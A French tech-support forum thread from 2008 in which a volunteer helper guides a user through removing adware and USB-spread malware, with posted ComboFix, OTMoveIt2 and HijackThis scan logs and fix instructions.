Clique sur le fichier CFScript, maintient le doigt enfoncé et glisse la souris pour que l'icône du CFScript vienne recouvrir l'icône de Combofix. Relache la souris. Combofix va démarrer.

Une fenêtre bleue va apparaître: au message qui apparaît ( Type 1 to continue, or 2 to abort) , tape 1 puis valide.

Patiente le temps du scan.Le bureau va disparaître à plusieurs reprises: c'est normal!

Ne touche à rien tant que le scan n'est pas terminé.

Une fois le scan achevé, un rapport va s'afficher: poste son contenu.

Remets aussi un rapport Hijackthis

Si le fichier ne s'ouvre pas, il se trouve ici > C:\ComboFix.txt
0
Réponse 12 / 50
waeeeeeelllll
 
voici le rapport de OTMOVIT2

File/Folder C:\WINDOWS\system32\amvo.exe not found.
C:\Program Files\AskBarFr\PopSwatter\History moved successfully.
C:\Program Files\AskBarFr\PopSwatter moved successfully.
C:\Program Files\AskBarFr\bar\Settings moved successfully.
C:\Program Files\AskBarFr\bar\History moved successfully.
C:\Program Files\AskBarFr\bar\Cache moved successfully.
C:\Program Files\AskBarFr\bar\bin moved successfully.
C:\Program Files\AskBarFr\bar moved successfully.
C:\Program Files\AskBarFr moved successfully.

OTMoveIt2 by OldTimer - Version 1.0.4.3 log created on 08282008_152115
0
Réponse 13 / 50
jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 040
 
parfait fais le message 10
0
Réponse 14 / 50
waeeeeeelllll
 
merci beaucoup pour votre idee mais le scanne de rav jusqua maintenant il fais le scan a 2heur
0
Réponse 15 / 50
jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 040
 
alors arrete le et passe a la suite!!!!!
0
Réponse 16 / 50
waeeeeeelllll
 
je m'exuse pour mon absence.
voici le rapport

ComboFix 08-08-27.05 - walid 2008-08-29 1:37:34.2 - NTFSx86
Microsoft Windows XP Édition familiale 5.1.2600.2.1252.1.1036.18.657 [GMT 2:00]
Endroit: C:\Documents and Settings\walid\Bureau\ComboFix.exe
Command switches used :: C:\Documents and Settings\walid\Bureau\CFscript

[color=red][b]AVERTISSEMENT - LA CONSOLE DE RÉCUPÉRATION N'EST PAS INSTALLÉE SUR CETTE MACHINE !![/b][/color]

FILE ::
C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll
C:\WINDOWS\system32\SpiderH.vbs
.

(((((((((((((((((((((((((((((((((((( Autres suppressions ))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\WINDOWS\system32\SpiderH.vbs

.
((((((((((((((((((((((((((((( Fichiers créés 2008-07-28 to 2008-08-28 ))))))))))))))))))))))))))))))))))))
.

2008-08-28 15:25 . 2008-08-28 15:25 <REP> d-------- C:\Program Files\AskBarFr
2008-08-28 14:43 . 2008-08-28 14:43 <REP> d-------- C:\_OTMoveIt
2008-08-28 14:26 . 2008-08-28 14:26 <REP> d-------- C:\Documents and Settings\InvitÚ
2008-08-28 13:34 . 2008-08-28 13:42 <REP> d-------- C:\Program Files\Navilog1
2008-08-28 13:28 . 2008-08-28 14:04 2,220 --a------ C:\Documents and Settings\Orph.egd
2008-08-28 13:26 . 2008-08-28 14:04 <REP> d-------- C:\ToolBar SD
2008-08-28 12:48 . 2008-08-28 12:48 <REP> d-------- C:\Program Files\Trend Micro
2008-08-25 16:52 . 2008-08-25 16:52 <REP> d-------- C:\Documents and Settings\walid\Application Data\Malwarebytes
2008-08-25 16:52 . 2008-08-25 16:52 <REP> d-------- C:\Documents and Settings\All Users\Application Data\Malwarebytes
2008-08-25 02:17 . 2008-08-25 02:17 <REP> d-------- C:\Documents and Settings\walid\Application Data\Babylon
2008-08-25 02:17 . 2008-08-25 02:17 <REP> d-------- C:\Documents and Settings\All Users\Application Data\Babylon
2008-08-25 00:52 . 2008-08-27 23:19 <REP> d-------- C:\Program Files\SUPERAntiSpyware
2008-08-25 00:50 . 2008-08-25 00:50 <REP> d-------- C:\Documents and Settings\walid\Application Data\DivX
2008-08-25 00:44 . 2008-08-25 00:44 28,672 --a------ C:\WINDOWS\system32\ncmd.exe
2008-08-24 00:59 . 2008-08-24 01:06 <REP> d--h----- C:\LG3G
2008-08-24 00:58 . 2008-08-24 00:58 <REP> d-------- C:\Documents and Settings\walid\Application Data\LG Electronics
2008-08-24 00:54 . 2008-08-24 00:55 <REP> d-------- C:\Program Files\DivX
2008-08-24 00:53 . 2008-08-24 00:53 <REP> d-------- C:\Program Files\LG Electronics
2008-08-24 00:53 . 2007-07-11 10:45 21,632 --a------ C:\WINDOWS\system32\drivers\lgusbmodem.sys
2008-08-24 00:53 . 2007-07-11 15:51 19,840 --a------ C:\WINDOWS\system32\drivers\lgusbdiag.sys
2008-08-24 00:53 . 2007-07-11 10:40 12,416 --a------ C:\WINDOWS\system32\drivers\lgusbbus.sys
2008-08-24 00:52 . 2008-08-24 00:52 <REP> d-------- C:\Program Files\LG PC Suite 2
2008-08-24 00:51 . 2008-08-24 00:51 <REP> d-------- C:\Documents and Settings\walid\Application Data\InstallShield
2008-08-21 13:17 . 2008-08-21 13:22 <REP> d-------- C:\Program Files\YouTube Video Downloader
2008-08-16 11:13 . 2008-08-27 23:19 <REP> d-------- C:\Documents and Settings\walid\Application Data\SUPERAntiSpyware.com
2008-08-16 11:13 . 2008-08-16 11:13 <REP> d-------- C:\Documents and Settings\All Users\Application Data\SUPERAntiSpyware.com
2008-08-06 20:52 . 2008-08-27 23:17 <REP> d-------- C:\Program Files\a-squared Anti-Malware
2008-07-30 00:47 . 2004-08-04 00:54 21,504 --a------ C:\WINDOWS\system32\hidserv.dll
2008-07-30 00:47 . 2004-08-04 00:54 21,504 --a--c--- C:\WINDOWS\system32\dllcache\hidserv.dll
2008-07-30 00:47 . 2004-08-04 00:45 14,848 --a------ C:\WINDOWS\system32\drivers\kbdhid.sys
2008-07-30 00:47 . 2004-08-04 00:45 14,848 --a--c--- C:\WINDOWS\system32\dllcache\kbdhid.sys

.
(((((((((((((((((((((((((((((((((( Compte-rendu de Find3M ))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-08-28 23:30 --------- d-----w C:\Documents and Settings\walid\Application Data\Skype
2008-08-28 23:26 --------- d-----w C:\Documents and Settings\walid\Application Data\skypePM
2008-08-28 10:31 --------- d-----w C:\Program Files\Spybot - Search & Destroy
2008-08-28 10:29 --------- d-----w C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2008-08-27 12:23 --------- d-----w C:\Documents and Settings\walid\Application Data\WinEdt
2008-08-23 22:53 --------- d--h--w C:\Program Files\InstallShield Installation Information
2008-08-23 22:53 --------- d-----w C:\Program Files\Fichiers communs\InstallShield
2008-08-15 12:00 --------- d-----w C:\Documents and Settings\All Users\Application Data\Microsoft Help
2008-07-24 22:57 --------- d-----w C:\Documents and Settings\All Users\Application Data\WinZip
2008-07-21 08:17 5,632 ----a-w C:\WINDOWS\system32\drivers\StarOpen.sys
2008-07-19 11:56 --------- d-----w C:\Documents and Settings\walid\Application Data\VersionTracker Pro
2008-07-19 11:47 --------- d-----w C:\Program Files\TechTracker
2008-07-19 10:02 --------- d-----w C:\Program Files\Java
2008-07-18 15:19 --------- d-----w C:\Program Files\CamStudio
2008-07-07 20:31 253,952 ----a-w C:\WINDOWS\system32\es.dll
2008-06-24 16:23 74,240 ----a-w C:\WINDOWS\system32\mscms.dll
2008-06-23 15:40 663,552 ----a-w C:\WINDOWS\system32\wininet.dll
2008-06-20 17:41 247,808 ----a-w C:\WINDOWS\system32\mswsock.dll
2008-06-02 11:02 164 ----a-w C:\install.dat
2008-04-30 22:43 940 ----a-w C:\Documents and Settings\walid\Application Data\filterclsid.dat
2008-03-06 18:16 32 ----a-w C:\Documents and Settings\All Users\Application Data\ezsid.dat
.

((((((((((((((((((((((((((((((((( Point de chargement Reg )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* les éléments vides & les éléments initiaux légitimes ne sont pas listés
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-05 14:00 15360]
"MsnMsgr"="C:\Program Files\MSN Messenger\MsnMsgr.Exe" [2007-09-04 23:40 6856704]
"Skype"="C:\Program Files\Skype\Phone\Skype.exe" [2008-02-06 19:21 21898024]
"updateMgr"="C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" [2006-03-30 16:45 313472]
"swg"="C:\Program Files\Google\GoogleToolbarNotifier\1.2.1128.5462\GoogleToolbarNotifier.exe" [2008-06-01 13:36 171448]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe" [2008-06-10 04:27 144784]
"SiSUSBRG"="C:\WINDOWS\SiSUSBrg.exe" [2002-07-12 19:15 106496]
"IgfxTray"="C:\WINDOWS\system32\igfxtray.exe" [2005-02-08 05:36 155648]
"HotKeysCmds"="C:\WINDOWS\system32\hkcmd.exe" [2005-02-08 05:32 126976]
"Apoint"="C:\Program Files\Apoint2K\Apoint.exe" [2003-12-05 08:22 159744]
"PowerManager"="C:\Program Files\Power Manager\PM.exe" [2005-03-30 16:07 159744]
"OdTray.exe"="C:\Program Files\Fujitsu Siemens Computers\Odyssey Client for Fujitsu Siemens Computers\OdTray.exe" [2005-05-18 16:14 1015871]
"DeviceDiscovery"="C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe" [2002-12-02 21:56 40960]
"TkBellExe"="C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" [2008-02-27 18:41 185896]
"NeroFilterCheck"="C:\WINDOWS\system32\NeroCheck.exe" [2001-07-09 11:50 155648]
"HPDJ Taskbar Utility"="C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb08.exe" [2003-03-11 12:08 172032]
"HP Software Update"="C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd.exe" [2002-12-17 11:40 49152]
"SoundMan"="SOUNDMAN.EXE" [2005-01-20 15:04 77824 C:\WINDOWS\SOUNDMAN.EXE]
"AGRSMMSG"="AGRSMMSG.exe" [2004-07-22 08:38 88361 C:\WINDOWS\AGRSMMSG.exe]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="C:\WINDOWS\system32\CTFMON.EXE" [2004-08-05 14:00 15360]

C:\Documents and Settings\walid\Menu D‚marrer\Programmes\D‚marrage\
MSN Pictures Displayer.lnk - C:\Program Files\MSN Pictures Displayer\MSN Pictures Displayer.exe [2005-05-28 11:35:25 4561920]

C:\Documents and Settings\All Users\Menu D‚marrer\Programmes\D‚marrage\
Lancement rapide d'Adobe Reader.lnk - C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe [2008-04-23 03:38:16 29696]
WinZip Quick Pick.lnk - C:\Program Files\WinZip\WZQKPICK.EXE [2007-04-30 11:10:00 394856]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\OdysseyClient]
2008-01-10 09:49 106496 C:\WINDOWS\system32\odyEvent.dll

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
SecurityProviders msapsspc.dllschannel.dlldigest.dllmsnsspc.dll

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusDisableNotify"=dword:00000001
"UpdatesDisableNotify"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Microsoft Office\\Office12\\OUTLOOK.EXE"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"C:\\WINDOWS\\pchealth\\helpctr\\binaries\\HelpCtr.exe"=
"C:\\Program Files\\MSN Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Real\\RealPlayer\\realplay.exe"=
"C:\\Program Files\\Skype\\Phone\\Skype.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"443:UDP"= 443:UDP:*:Disabled:UDP port 443 ooVoo
"37674:TCP"= 37674:TCP:*:Disabled:TCP port 37674 ooVoo
"37674:UDP"= 37674:UDP:*:Disabled:UDP port 37674 ooVoo
"37675:UDP"= 37675:UDP:*:Disabled:UDP port 37675 ooVoo

R3 odysseyIM4;Odyssey Network Agent Miniport;C:\WINDOWS\system32\DRIVERS\odysseyIM4.sys [2005-05-18 14:52]
S3 Boonty Games;Boonty Games;C:\Program Files\Fichiers communs\BOONTY Shared\Service\Boonty.exe [2005-05-24 14:36]
S3 EKBfltr;ENE Keyboard Controller;C:\WINDOWS\system32\DRIVERS\EKBfltr.sys [2005-01-14 12:22]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{35320280-ef7f-11dc-a24c-0012f0d3a1cd}]
\Shell\AutoRun\command - E:\n2de.cmd
\Shell\explore\Command - E:\n2de.cmd
\Shell\open\Command - E:\n2de.cmd

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{35320288-ef7f-11dc-a24c-0012f0d3a1cd}]
\Shell\AutoRun\command - E:\LaunchU3.exe -a

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{6672f410-722d-11dd-a521-0012f0d3a1cd}]
\Shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL Wallpaper.vbs
\Shell\Explore\Command - Wscript \Wallpaper.vbs
\Shell\Open\Command - Wscript \Wallpaper.vbs

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{8f870262-1851-11dd-a30a-0012f0d3a1cd}]
\Shell\??\command - taipingtianguov1.1.exe
\Shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL taipingtianguov1.1.exe

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b393b590-b5d4-11da-a260-0012f0d3a1cd}]
\Shell\AutoRun\command - E:\3o.exe
\Shell\explore\Command - E:\3o.exe
\Shell\open\Command - E:\3o.exe

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{d49a7440-c366-11dc-a190-0012f0d3a1cd}]
\Shell\AutoRun\command - E:\bpu.exe
\Shell\explore\Command - E:\bpu.exe
\Shell\open\Command - E:\bpu.exe

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{dfdee880-b5c4-11da-a25f-0012f0d3a1cd}]
\Shell\AutoRun\command - E:\3o.exe
\Shell\explore\Command - E:\3o.exe
\Shell\open\Command - E:\3o.exe

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{fe2f1d10-ec8a-11dc-a23c-0012f0d3a1cd}]
\Shell\AutoRun\command - E:\x6.bat
\Shell\explore\Command - E:\x6.bat
\Shell\open\Command - E:\x6.bat

*Newly Created Service* - CATCHME
*Newly Created Service* - WINIO
.
Contenu du dossier 'Scheduled Tasks/Tâches planifiées'

2008-08-28 C:\WINDOWS\Tasks\Vérifier les mises à jour de Windows Live Toolbar.job
- C:\Program Files\Windows Live Toolbar\MSNTBUP.EXE [2006-09-27 17:39]
.
- - - - ORPHANS REMOVED - - - -

WebBrowser-{5A074B29-F830-49DE-A31B-26E51D6FD4D9} - C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll
HKLM-Run-SpiderH - C:\WINDOWS\system32\SpiderH.vbs

**************************************************************************

catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-08-29 01:39:54
Windows 5.1.2600 Service Pack 2 NTFS

Balayage processus cachés ...

Balayage caché autostart entries ...

Balayage des fichiers cachés ...

Scan terminé avec succès
Les fichiers cachés: 0

**************************************************************************
.
Temps d'accomplissement: 2008-08-29 1:40:48
ComboFix-quarantined-files.txt 2008-08-28 23:40:45
ComboFix2.txt 2008-08-28 12:26:44

Pre-Run: 65,499,299,840 octets libres
Post-Run: 65,518,489,600 octets libres

182 --- E O F --- 2008-08-15 12:00:50
0
Réponse 17 / 50
waeeeeeelllll
 
le deuxième rapport

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 01:46:11, on 29/08/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Fujitsu Siemens Computers\Odyssey Client for Fujitsu Siemens Computers\odClientService.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\AGRSMMSG.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\Power Manager\PM.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe
C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe
C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb08.exe
C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.1128.5462\GoogleToolbarNotifier.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\Program Files\Apoint2K\Apntex.exe
C:\Program Files\Skype\Plugin Manager\skypePM.exe
C:\WINDOWS\system32\notepad.exe
C:\WINDOWS\explorer.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
C:\Program Files\Windows Live Toolbar\msn_sl.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,SearchAssistant = http://www.crawler.com/search/ie.aspx?tb_id=66005
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,CustomizeSearch = http://dnl.crawler.com/support/sa_customize.aspx?TbId=66005
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: AskBarFr BHO - {5A074B21-F830-49de-A31B-26E51D6FD4D9} - C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O2 - BHO: Windows Live Toolbar Helper - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: Windows Live Toolbar - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe"
O4 - HKLM\..\Run: [SiSUSBRG] C:\WINDOWS\SiSUSBrg.exe
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
O4 - HKLM\..\Run: [Apoint] "C:\Program Files\Apoint2K\Apoint.exe"
O4 - HKLM\..\Run: [PowerManager] C:\Program Files\Power Manager\PM.exe
O4 - HKLM\..\Run: [OdTray.exe] "C:\Program Files\Fujitsu Siemens Computers\Odyssey Client for Fujitsu Siemens Computers\OdTray.exe"
O4 - HKLM\..\Run: [DeviceDiscovery] "C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb08.exe
O4 - HKLM\..\Run: [HP Software Update] "C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd.exe"
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [updateMgr] "C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" AcRdB7_1_0
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\1.2.1128.5462\GoogleToolbarNotifier.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICE RÉSEAU')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Startup: MSN Pictures Displayer.lnk = C:\Program Files\MSN Pictures Displayer\MSN Pictures Displayer.exe
O4 - Global Startup: Lancement rapide d'Adobe Reader.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: WinZip Quick Pick.lnk = C:\Program Files\WinZip\WZQKPICK.EXE
O8 - Extra context menu item: &Enregistrer cette page dans MonAsk - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/savewebpage.html
O8 - Extra context menu item: &Enregistrer l'image dans MonAsk - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/saveimages.html
O8 - Extra context menu item: &Enregistrer l'image dans un dossier - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/saveimagetofolder.html
O8 - Extra context menu item: &Enregistrer la page dans un dossier… - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/savepagetofolder.html
O8 - Extra context menu item: &Enregistrer le lien dans MonAsk - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/savelink.html
O8 - Extra context menu item: &Enregistrer le lien dans un dossier - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/saveltof.html
O8 - Extra context menu item: &Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {30528230-99F7-4BB4-88D8-FA1D4F56A2AB} (YInstStarter Class) - http://us.dl1.yimg.com/download.yahoo.com/dl/installs/yinst20040510.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/...
O17 - HKLM\System\CCS\Services\Tcpip\..\{FF4405A7-048A-4750-AC06-597E612A5F29}: NameServer = 193.95.122.40 193.95.93.77
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\FICHIE~1\Skype\SKYPE4~1.DLL
O23 - Service: Boonty Games - BOONTY - C:\Program Files\Fichiers communs\BOONTY Shared\Service\Boonty.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: Odyssey Client for Fujitsu Siemens Computers (odClientService) - Funk Software, Inc. - C:\Program Files\Fujitsu Siemens Computers\Odyssey Client for Fujitsu Siemens Computers\odClientService.exe
0
Réponse 18 / 50
jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 040
 
vire le fichier askbarfr

C:\Program Files\AskBarFr

__________________

tu as quel antivirus???

__________________

relance hijackhtis, fais do a system scan only et fix ces lignes (fix cheked)

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,SearchAssistant = http://www.crawler.com/search/ie.aspx?tb_id=66005
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,CustomizeSearch = http://dnl.crawler.com/support/sa_customize.aspx?TbId=66005

O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)

O2 - BHO: AskBarFr BHO - {5A074B21-F830-49de-A31B-26E51D6FD4D9} - C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll (file missing)

O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe"

O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICE RÉSEAU')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Lancement rapide d'Adobe Reader.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: WinZip Quick Pick.lnk = C:\Program Files\WinZip\WZQKPICK.EXE
O8 - Extra context menu item: &Enregistrer cette page dans MonAsk - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/savewebpage.html
O8 - Extra context menu item: &Enregistrer l'image dans MonAsk - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/saveimages.html
O8 - Extra context menu item: &Enregistrer l'image dans un dossier - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/saveimagetofolder.html
O8 - Extra context menu item: &Enregistrer la page dans un dossier… - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/savepagetofolder.html
O8 - Extra context menu item: &Enregistrer le lien dans MonAsk - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/savelink.html
O8 - Extra context menu item: &Enregistrer le lien dans un dossier - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/saveltof.html
0
Réponse 19 / 50
waeeeeeelllll
 
j'ai fais ce que vous m'avez demandé et j'ai redémarré mon PC et il m'est affiché une autre fois le message suivant
Hi !!! walid ! dont worry i am a friend! Have a nice day
que dois je faire
merci
0
Réponse 20 / 50
jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 040
 
tu as quel antivirus???
0

Discussions similaires

Softonic,est-ce un virus ?
techmel1 -
techmel1 -

6 réponses
Erreur 0x800700E1
Didiervd -
Viktimz -

11 réponses
Désinstaller Softonic
Diguimette -
lilidurhone -

5 réponses
virus Artemis!
mabiche37 -
Malekal_morte- -

14 réponses